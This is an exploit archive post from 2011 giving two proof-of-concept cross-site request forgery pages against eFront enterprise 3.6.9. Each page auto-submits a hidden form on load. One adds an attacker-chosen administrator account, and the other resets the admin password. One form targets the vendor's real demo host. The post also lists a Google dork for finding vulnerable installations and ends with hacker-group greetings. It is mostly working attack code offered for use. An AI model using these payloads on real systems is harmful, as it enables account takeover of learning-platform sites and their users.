eFront enterprise <=XSRF (Add admin/change admin passwd)



EKU-ID: 373 CVE: OSVDB-ID:
Author: Caddy-Dz Published: 2011-06-01 Verified: Not Verified
Download:

Rating

☆☆☆☆☆
Home


=================================================================================
                      .__         .__  __            .__    .___

  ____ ___  _________ |  |   ____ |__|/  |_          |__| __| _/
_/ __ \\  \/  /\____ \|  |  /  _ \|  \   __\  ______ |  |/ __ |
\  ___/ >    < |  |_> >  |_(  <_> )  ||  |   /_____/ |  / /_/ |

\___  >__/\_ \|   __/|____/\____/|__||__|           |__\____ |
     \/      \/|__|                                          \/

Exploit-ID is the Indonesian Exploit Archive

Web             : exploit-id.com

e-mail          : root[at]exploit-id.com              

                      #########################################
                       I'm Caddy-Dz ,  member of exploit-id.com

                      #########################################  
================================================================================
####
# Exploit Title: eFront enterprise <=XSRF (Add admin/change admin passwd)
# Author: Caddy-Dz
# Facebook Page: www.facebook.com/islam.caddy
# E-mail: islam_babia@hotmail.com  |  Caddy-Dz@exploit-id.com
# Category:: webapps
# Google Dork: intext:"enterprise Edition" inurl:/www/index.php
# Vendor: http://www.efrontlearning.net/
# Version: 3.6.9
# Tested on: [Windows Vista Edition Intégrale]
####

[*] #01# Add Admin: ~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~~~~~~~~

<html>
<head>
<title>Algerians Hackers</title>
</head>

<body onload="javascript:fireForms()">
<script language="JavaScript">

function fireForms()
{
    var count = 1;
    var i=0;
   
    for(i=0; i<count; i++)
    {
        document.forms[i].submit();
    }
}
  
</script>

<form  action="http://127.0.0.1/enterprise/www/administrator.php?ctg=personal&amp;user=admin&amp;op=profile&amp;add_user=1" method="post" name="user_form" id="user_form" enctype="multipart/form-data" onsubmit="try { var myValidator = validate_user_form; } catch(e) { return true; } return myValidator(this);">
  <input name="_qf__user_form" type="hidden" value="" /><input name="MAX_FILE_SIZE" type="hidden" value="8388608" />
  <table class = "formElements">
  <input type="hidden" name="login" / value="caddy-dz">
  <input type="hidden" name="password_" / value="caddy-dz">
  <input type="hidden" name="passrepeat" / value="caddy-dz">
  <input type="hidden" name="name" / value="islem">
  <input type="hidden" name="surname" / value="cadi">
  <input type="hidden" name="email" / value="caddy-dz@exploit-id.com">
  <input type="hidden" name="active" value="0" /><input class="inputCheckbox" id="activeCheckbox" name="active" type="checkbox" value="1" checked="checked" /></td></tr>
  <td class = "elementCell"><select name="user_type">
<option value="student">Student</option>
<option value="professor">Professor</option>
<option value="administrator" selected="selected">Administrator</option>
</form>



[*] #02# Change Admin Password:~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



<html>
<head>
<title>Algerians Hackers</title>
</head>

<body onload="javascript:fireForms()">
<script language="JavaScript">

function fireForms()
{
    var count = 1;
    var i=0;
   
    for(i=0; i<count; i++)
    {
        document.forms[i].submit();
    }
}
  
</script>
<form  action="http://demo.efrontlearning.net/enterprise/www/administrator.php?ctg=personal&amp;user=admin&amp;op=profile" method="post" name="user_form" id="user_form" enctype="multipart/form-data" onsubmit="try { var myValidator = validate_user_form; } catch(e) { return true; } return myValidator(this);">
  <input name="_qf__user_form" type="hidden" value="" /><input name="MAX_FILE_SIZE" type="hidden" value="8388608" />
  <table class = "formElements">
  <input type="hidden" name="login" value="admin" />
  <input type="hidden" name="password_" type="password" / value="caddy-dz">
  <input type="hidden" name="passrepeat" type="password" / value="caddy-dz">
  <input type="hidden" name="name" type="text" value="islem" />
  <input type="hidden" name="surname" type="text" value="cadi" />
  <input type="hidden" name="email" type="text" value="caddy-dz@exploit-id.com" />
  <input type="hidden" name="user_type" value="administrator" />
 
</form>


####
Peace From Algeria
####

=================================**Algerians Hackers**=======================================
# Greets To :
  KedAns-Dz & **All Algerians Hackers** , jos_ali_joe , All Exploit-Id Team ,  Kalashinkov3 ,
  (exploit-id.com) , (1337day.com) , (09exploit.com) , All My Friends: T!riRou , ChoK0 , MeRdaw! ,
  CaRras0 , StiffLer , MaaTar , St0fa , Nissou , RmZ ...others
============================================================================================